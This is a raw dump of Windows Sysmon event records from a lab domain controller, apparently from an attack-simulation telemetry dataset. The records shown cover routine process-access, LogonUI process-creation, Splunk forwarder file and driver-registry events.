12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003960Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003959Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003958Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003957Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003956Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003955Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-64C1-6064-9200-00000000AE01}25523220C:\Windows\system32\winlogon.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+193b7|C:\Windows\system32\winlogon.exe+22617|C:\Windows\system32\winlogon.exe+2b287|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003954Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.667{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\System32\LogonUI.exe10.0.14393.0 (rs1_release.160715-1616)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x2 /state0:0xa3a56855 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e72SystemMD5=B38DFCF985D8AE5B1A17C264981E61C7,SHA256=AA62D29803D52EC06CD27ED3124E034048F09606EB7342181913C9817C7B44C5,IMPHASH=A6F3A84D171E55B51A7343E05C8DFAC3{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\System32\winlogon.exewinlogon.exe 10341000x80000000000000003953Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003952Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003951Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.661{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003950Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.645{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+4689|c:\windows\system32\themeservice.dll+3fdd|c:\windows\system32\themeservice.dll+3c53|c:\windows\system32\themeservice.dll+2675|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003949Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.645{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003948Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.645{266CAFBE-646C-6064-1000-00000000AE01}11242372C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x147aC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\themeservice.dll+3de3|c:\windows\system32\themeservice.dll+26c0|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003947Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.645{266CAFBE-646C-6064-1000-00000000AE01}11241624C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003946Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.536{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003945Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.536{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003944Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.536{266CAFBE-64C1-6064-9100-00000000AE01}51084108C:\Windows\system32\csrss.exe{266CAFBE-646C-6064-0F00-00000000AE01}1116C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\winsrv.DLL+1ef0|C:\Windows\system32\winsrv.DLL+17e9|C:\Windows\system32\winsrv.DLL+1579|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000003943Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.287{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9AC1A99A189C9C765785FB643D391BCC,SHA256=DAEDCB6F931D74BC6AAC1557DADB7D19F2CD367D82BE4AB05BA138521CBE0A59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000003942Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.287{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E586F74CFE940CDC3FC885A129FF0975,SHA256=2CEFC3A78982D86D03A1FDB577A4A0B1AA731D72A35D782FCAD7B4F643159186,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000003941Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.240{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000003940Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000003939Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\CountDWORD (0x00000002) 13241300x80000000000000003938Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Mouse0 13241300x80000000000000003937Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000003936Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000002) 13241300x80000000000000003935Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Mouse0 13241300x80000000000000003934Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localInvDB-DriverVerSetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Control\Class\{4d36e96f-e325-11ce-bfc1-08002be10318}\0001\DriverVersion10.0.14393.0 13241300x80000000000000003933Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\NextInstanceDWORD (0x00000002) 13241300x80000000000000003932Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\CountDWORD (0x00000002) 13241300x80000000000000003931Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\1TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Keyboard0 13241300x80000000000000003930Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000001) 13241300x80000000000000003929Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000001) 13241300x80000000000000003928Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:02:09.209{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\0TERMINPUT_BUS\UMB\2&2c22bcc9&0&Session2Keyboard0 13241300x80000000000000003927Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localInvDB-DriverVerSetValue2021-03-31 12:02:09.194{266CAFBE-6467-6064-0100-00000000AE01}4SystemHKLM\System\CurrentControlSet\Control\Class\{4d36e96b-e325-11ce-bfc1-08002be10318}\0001\DriverVersion10.0.14393.0 10341000x80000000000000003926Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2387f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003925Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+2380c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003924Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+237c4|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003923Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.194{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003922Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 